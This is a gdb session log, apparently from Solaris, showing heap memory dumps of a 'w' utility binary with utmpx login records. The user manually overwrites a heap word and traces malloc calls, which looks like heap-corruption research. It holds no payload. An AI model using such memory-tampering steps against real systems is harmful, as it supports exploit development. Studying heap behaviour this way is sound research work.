0x34860: 0x00000000 0x00000000 0x00000000 0x00000000
0x34870: 0x00000000 0x00000000 0x00000000 0x00000000
0x34880: 0x00000000 0x00000000 0x00000000 0x00000000
0x34890: 0x00000000 0x00000000 0x00000000 0x00000000
0x348a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x348b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x348c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x348d0: 0x00000000 0x00000000 0x00000000 0x0000002f
0x348e0: 0x62617a7a 0x00000000 0x00000000 0x00000000
0x348f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x34900: 0x732f3131 0x7074732f 0x31310000 0x00000000
0x34910: 0x00000000 0x00000000 0x00000000 0x00000000
0x34920: 0x00000000 0x00007527 0x00080000 0x00000000
0x34930: 0x544b6431 0x000def0a 0x00000000 0x00000000
0x34940: 0x00000000 0x00000000 0x00000000 0x00000000
0x34950: 0x00000000 0x00000000 0x00000000 0x00000000
0x34960: 0x00000000 0x00000000 0x00000000 0x00000000
0x34970: 0x00000000 0x00000000 0x00000000 0x00000000
0x34980: 0x00000000 0x00000000 0x00000000 0x00000000
0x34990: 0x00000000 0x00000000 0x00000000 0x00000000
0x349a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x349b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x349c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x349d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x349e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x349f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a00: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a10: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a30: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a40: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a50: 0x00000000 0x6a6b7269 0x63680000 0x00000000
0x34a60: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a70: 0x00000000 0x732f3132 0x7074732f 0x31320000
(gdb)
0x34a80: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a90: 0x00000000 0x00000000 0x0000083d 0x00080000
0x34aa0: 0x00000000 0x527021bc 0x0001e605 0x00000000
0x34ab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ad0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ae0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34af0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b00: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b10: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b30: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b40: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b50: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b60: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b70: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b80: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b90: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ba0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34bc0: 0x00000000 0x00000000 0x64656d69 0x6a61636b
0x34bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34be0: 0x00000000 0x00000000 0x732f3133 0x7074732f
0x34bf0: 0x31330000 0x00000000 0x00000000 0x00000000
(gdb)
0x34c00: 0x00000000 0x00000000 0x00000000 0x000006b2
0x34c10: 0x00080000 0x00000000 0x52701251 0x00074603
0x34c20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c30: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c40: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c50: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c60: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c70: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c80: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c90: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34cb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34cc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34cd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ce0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34cf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34d00: 0x00000000 0x00000000 0x00000000 0x00000000
0x34d10: 0x00000000 0x00000000 0x00000000 0x00000000
0x34d20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34d30: 0x00000000 0x00000000 0x00000000 0x61676172
0x34d40: 0x61790000 0x00000000 0x00000000 0x00000000
0x34d50: 0x00000000 0x00000000 0x00000000 0x732f3134
0x34d60: 0x7074732f 0x31340000 0x00000000 0x00000000
0x34d70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x34d80: 0x00001603 0x00080000 0x00000000 0x52524378
0x34d90: 0x00032ffd 0x00000000 0x00000000 0x00000000
0x34da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ea0: 0x00000000 0x00000000 0x00000000 0x0000002f
0x34eb0: 0x6b657662 0x30303031 0x00000000 0x00000000
0x34ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ed0: 0x732f3135 0x7074732f 0x31350000 0x00000000
0x34ee0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ef0: 0x00000000 0x0000156f 0x00080000 0x00000000
(gdb)
0x34f00: 0x525241c4 0x00052c9f 0x00000000 0x00000000
0x34f10: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f30: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f40: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f50: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f60: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f70: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f80: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f90: 0x00000000 0x00000000 0x00000000 0x00000000
0x34fa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34fb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34fc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34fd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34fe0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ff0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35000: 0x00000000 0x00000000 0x00000000 0x00000000
0x35010: 0x00000000 0x00000000 0x00000000 0x00000000
0x35020: 0x00000000 0x64687572 0x6c627574 0x00000000
0x35030: 0x00000918 0x00000000 0x00000000 0x00000000
0x35040: 0x00000000 0x00000000 0x00000000 0x00000000
0x35050: 0x00000000 0x00000000 0x00000000 0x00000000
0x35060: 0x00000000 0x00000000 0x00000000 0x00000000
0x35070: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x35080: 0x00000000 0x00000000 0x00000000 0x00000000
0x35090: 0x00000000 0x00000000 0x00000000 0x00000000
0x350a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35100: 0x00000000 0x00000000 0x00000000 0x00000000
0x35110: 0x00000000 0x00000000 0x00000000 0x00000000
0x35120: 0x00000000 0x00000000 0x00000000 0x00000000
0x35130: 0x00000000 0x00000000 0x00000000 0x00000000
0x35140: 0x00000000 0x00000000 0x00000000 0x00000000
0x35150: 0x00000000 0x00000000 0x00000000 0x00000000
0x35160: 0x00000000 0x00000000 0x00000000 0x00000000
0x35170: 0x00000000 0x00000000 0x00000000 0x00000000
0x35180: 0x00000000 0x00000000 0x00000000 0x00000000
0x35190: 0x00000000 0x00000000 0x00000000 0x00000000
0x351a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x351b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x351c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x351d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x351e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x351f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x35200: 0x00000000 0x00000000 0x00000000 0x00000000
0x35210: 0x00000000 0x00000000 0x00000000 0x00000000
0x35220: 0x00000000 0x00000000 0x00000000 0x00000000
0x35230: 0x00000000 0x00000000 0x00000000 0x00000000
0x35240: 0x00000000 0x00000000 0x00000000 0x00000000
0x35250: 0x00000000 0x00000000 0x00000000 0x00000000
0x35260: 0x00000000 0x00000000 0x00000000 0x00000000
0x35270: 0x00000000 0x00000000 0x00000000 0x00000000
0x35280: 0x00000000 0x00000000 0x00000000 0x00000000
0x35290: 0x00000000 0x00000000 0x00000000 0x00000000
0x352a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x352b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x352c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x352d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x352e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x352f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35300: 0x00000000 0x00000000 0x00000000 0x00000000
0x35310: 0x00000000 0x00000000 0x00000000 0x00000000
0x35320: 0x00000000 0x00000000 0x00000000 0x00000000
0x35330: 0x00000000 0x00000000 0x00000000 0x00000000
0x35340: 0x00000000 0x00000000 0x00000000 0x00000000
0x35350: 0x00000000 0x00000000 0x00000000 0x00000000
0x35360: 0x00000000 0x00000000 0x00000000 0x00000000
0x35370: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x35380: 0x00000000 0x00000000 0x00000000 0x00000000
0x35390: 0x00000000 0x00000000 0x00000000 0x00000000
0x353a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x353b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x353c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x353d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x353e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x353f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35400: 0x00000000 0x00000000 0x00000000 0x00000000
0x35410: 0x00000000 0x00000000 0x00000000 0x00000000
0x35420: 0x00000000 0x00000000 0x00000000 0x00000000
0x35430: 0x00000000 0x00000000 0x00000000 0x00000000
0x35440: 0x00000000 0x00000000 0x00000000 0x00000000
0x35450: 0x00000000 0x00000000 0x00000000 0x00000000
0x35460: 0x00000000 0x00000000 0x00000000 0x00000000
0x35470: 0x00000000 0x00000000 0x00000000 0x00000000
0x35480: 0x00000000 0x00000000 0x00000000 0x00000000
0x35490: 0x00000000 0x00000000 0x00000000 0x00000000
0x354a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x354b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x354c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x354d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x354e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x354f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x35500: 0x00000000 0x00000000 0x00000000 0x00000000
0x35510: 0x00000000 0x00000000 0x00000000 0x00000000
0x35520: 0x00000000 0x00000000 0x00000000 0x00000000
0x35530: 0x00000000 0x00000000 0x00000000 0x00000000
0x35540: 0x00000000 0x00000000 0x00000000 0x00000000
0x35550: 0x00000000 0x00000000 0x00000000 0x00000000
0x35560: 0x00000000 0x00000000 0x00000000 0x00000000
0x35570: 0x00000000 0x00000000 0x00000000 0x00000000
0x35580: 0x00000000 0x00000000 0x00000000 0x00000000
0x35590: 0x00000000 0x00000000 0x00000000 0x00000000
0x355a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x355b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x355c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x355d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x355e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x355f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35600: 0x00000000 0x00000000 0x00000000 0x00000000
0x35610: 0x00000000 0x00000000 0x00000000 0x00000000
0x35620: 0x00000000 0x00000000 0x00000000 0x00000000
0x35630: 0x00000000 0x00000000 0x00000000 0x00000000
0x35640: 0x00000000 0x00000000 0x00000000 0x00000000
0x35650: 0x00000000 0x00000000 0x00000000 0x00000000
0x35660: 0x00000000 0x00000000 0x00000000 0x00000000
0x35670: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x35680: 0x00000000 0x00000000 0x00000000 0x00000000
0x35690: 0x00000000 0x00000000 0x00000000 0x00000000
0x356a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x356b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x356c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x356d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x356e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x356f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35700: 0x00000000 0x00000000 0x00000000 0x00000000
0x35710: 0x00000000 0x00000000 0x00000000 0x00000000
0x35720: 0x00000000 0x00000000 0x00000000 0x00000000
0x35730: 0x00000000 0x00000000 0x00000000 0x00000000
0x35740: 0x00000000 0x00000000 0x00000000 0x00000000
0x35750: 0x00000000 0x00000000 0x00000000 0x00000000
0x35760: 0x00000000 0x00000000 0x00000000 0x00000000
0x35770: 0x00000000 0x00000000 0x00000000 0x00000000
0x35780: 0x00000000 0x00000000 0x00000000 0x00000000
0x35790: 0x00000000 0x00000000 0x00000000 0x00000000
0x357a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x357b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x357c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x357d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x357e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x357f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x35800: 0x00000000 0x00000000 0x00000000 0x00000000
0x35810: 0x00000000 0x00000000 0x00000000 0x00000000
0x35820: 0x00000000 0x00000000 0x00000000 0x00000000
0x35830: 0x00000000 0x00000000 0x00000000 0x00000000
0x35840: 0x00000000 0x00000000 0x00000000 0x00000000
0x35850: 0x00000000 0x00000000 0x00000000 0x00000000
0x35860: 0x00000000 0x00000000 0x00000000 0x00000000
0x35870: 0x00000000 0x00000000 0x00000000 0x00000000
0x35880: 0x00000000 0x00000000 0x00000000 0x00000000
0x35890: 0x00000000 0x00000000 0x00000000 0x00000000
0x358a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x358b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x358c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x358d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x358e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x358f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35900: 0x00000000 0x00000000 0x00000000 0x00000000
0x35910: 0x00000000 0x00000000 0x00000000 0x00000000
0x35920: 0x00000000 0x00000000 0x00000000 0x00000000
0x35930: 0x00000000 0x00000000 0x00000000 0x00000000
0x35940: 0x00000000 0x00000000 0x00035030 0x00000000
0x35950: 0x00000003 0x00000000 0x00000000 0x00000000
0x35960: 0x00000000 0x00000000 0x00000000 0x00000000
0x35970: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) set *0x35948=0x41035030
(gdb) c
Continuing.
bazz pts/1 5:10pm 24 /home/bazz/w_32
bazz pts/2 7:23pm 2 /home/bazz/w_32
bazz pts/3 7:34pm /home/bazz/w_32 -h
Program exited normally.
(gdb) r -h
Starting program: /home/bazz/w_32 -h
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) b _malloc_unlocked
Breakpoint 2 at 0xff2c1dc8
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2ca560 in opendir () from /usr/lib/libc.so.1
#3 0x000113d0 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x00011cf0 in main ()
#3 0x000114e0 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x00011cf0 in main ()
#3 0x00011784 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x00011cf0 in main ()
#3 0x000114e0 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x00011cf0 in main ()
#3 0x000114e0 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2d38b0 in tzcpy () from /usr/lib/libc.so.1
#3 0xff2d37f8 in getzname () from /usr/lib/libc.so.1
#4 0xff2d32fc in _ltzset_u () from /usr/lib/libc.so.1
#5 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6 0x00011e8c in main ()
#7 0x0001186c in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2b624c in calloc () from /usr/lib/libc.so.1
#3 0xff2d4a4c in _tzload () from /usr/lib/libc.so.1
#4 0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6 0x00011e8c in main ()
#7 0x0001186c in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2b624c in calloc () from /usr/lib/libc.so.1
#3 0xff2d4ce8 in _tzload () from /usr/lib/libc.so.1
#4 0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6 0x00011e8c in main ()
#7 0x0001186c in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2b624c in calloc () from /usr/lib/libc.so.1
#3 0xff2d4d08 in _tzload () from /usr/lib/libc.so.1
#4 0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6 0x00011e8c in main ()
#7 0x0001186c in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2b624c in calloc () from /usr/lib/libc.so.1
#3 0xff2d4d30 in _tzload () from /usr/lib/libc.so.1
#4 0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6 0x00011e8c in main ()
#7 0x0001186c in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2b624c in calloc () from /usr/lib/libc.so.1
#3 0xff2d4db4 in _tzload () from /usr/lib/libc.so.1
#4 0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6 0x00011e8c in main ()
#7 0x0001186c in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
bazz pts/1 5:10pm 25 /home/bazz/w_32
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
bazz pts/2 7:23pm 3 /home/bazz/w_32
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
bazz pts/3 7:34pm /home/bazz/w_32 -h
Program exited normally.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb) del 2
(gdb) r -h fooo
Starting program: /home/bazz/w_32 -h fooo
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) c
Continuing.
Program exited normally.
(gdb) r -h fooo
Starting program: /home/bazz/w_32 -h fooo
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35948=0x41035030
(gdb) c
Continuing.
Program exited normally.
(gdb) r -h fooo
Starting program: /home/bazz/w_32 -h fooo
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) b _malloc_unlocked
Breakpoint 3 at 0xff2c1dc8
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2ca560 in opendir () from /usr/lib/libc.so.1
#3 0x000113d0 in main ()
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x00011cf0 in main ()
#3 0x000114e0 in main ()
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x00011cf0 in main ()
#3 0x00011784 in main ()
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x00011cf0 in main ()
#3 0x000114e0 in main ()
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x00011cf0 in main ()
#3 0x000114e0 in main ()
(gdb) c
Continuing.
Program exited normally.
(gdb) r -h fooo
Starting program: /home/bazz/w_32 -h fooo
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1d24 in _smalloc () from /usr/lib/libc.so.1
#2 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3 0xff2b624c in calloc () from /usr/lib/libc.so.1
#4 0xff2fabb4 in textdomain () from /usr/lib/libc.so.1
#5 0x00010ee8 in main ()
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2fc22c in _textdomain_u () from /usr/lib/libc.so.1
#3 0xff2fabec in textdomain () from /usr/lib/libc.so.1
#4 0x00010ee8 in main ()
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1d24 in _smalloc () from /usr/lib/libc.so.1
#2 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3 0xff2fc22c in _textdomain_u () from /usr/lib/libc.so.1
#4 0xff2fabec in textdomain () from /usr/lib/libc.so.1
#5 0x00010ee8 in main ()
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x000110b4 in main ()
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff30f22c in _findbuf () from /usr/lib/libc.so.1
#3 0xff30f0e0 in _filbuf () from /usr/lib/libc.so.1
#4 0xff312cf8 in fread () from /usr/lib/libc.so.1
#5 0xff2bd91c in getutxent_frec () from /usr/lib/libc.so.1
